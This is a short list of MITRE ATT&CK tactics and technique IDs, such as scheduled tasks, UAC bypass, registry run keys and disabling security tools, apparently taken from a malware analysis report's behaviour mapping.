T1053

Scheduled Task

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

Scheduled Task/Job

T1053

Scheduled Task

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

Credential Access

Discovery

Query Registry

System Information Discovery